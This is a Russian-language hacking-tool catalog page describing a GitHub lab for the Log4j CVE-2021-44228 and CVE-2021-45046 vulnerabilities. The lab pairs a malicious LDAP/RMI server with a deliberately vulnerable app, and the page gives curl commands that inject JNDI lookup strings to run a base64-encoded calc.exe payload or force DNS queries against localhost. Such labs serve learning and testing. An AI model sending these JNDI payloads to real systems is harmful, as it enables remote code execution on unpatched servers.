Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j-cve-2021-44228 — Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ... | Kitploit
Инструменты/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
514 лет назадЕщё не проверено

Log4j CVE-2021-44228 и CVE-2021-45046

Требования

Используйте уязвимую JDK, например JDK 1.8.0_181

Использование

Вредоносный сервер

Вредоносный сервер разворачивает следующие конечные точки:

  • 1389 LDAP-сервер
  • 1099 RMI-сервер
  • 8081 HTTP-сервер
root@kitploit:~
./gradlew :malicious-server:bootRun

Уязвимое приложение

Уязвимое приложение разворачивает одну HTTP-конечную точку на 8082

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Удалённое выполнение кода

Выберите полезную нагрузку (payload), которая будет выполнена уязвимым приложением, и закодируйте её в Base64. Например, чтобы открыть калькулятор в Windows: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS-запросы

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Скачать инструмент